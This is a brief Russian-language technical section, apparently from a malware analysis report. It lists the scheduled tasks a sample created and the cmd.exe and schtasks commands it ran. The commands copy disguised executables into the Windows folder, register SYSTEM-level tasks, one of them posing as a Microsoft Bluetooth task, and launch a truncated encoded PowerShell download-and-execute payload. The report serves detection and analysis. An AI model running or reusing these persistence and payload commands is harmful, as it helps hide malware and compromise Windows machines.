Техническая информация
- <SYSTEM32>\tasks\microsoft\windows\bluetooths
- <SYSTEM32>\tasks\slsd
- <SYSTEM32>\tasks\pyedvoo
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\slSd.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\HdVWa.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\slSd.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\HdVWa.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn slSd /tr "%WINDIR%\slSd.exe" /F
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\pyedVOo" /tr "%WINDIR%\HdVWa.exe" /F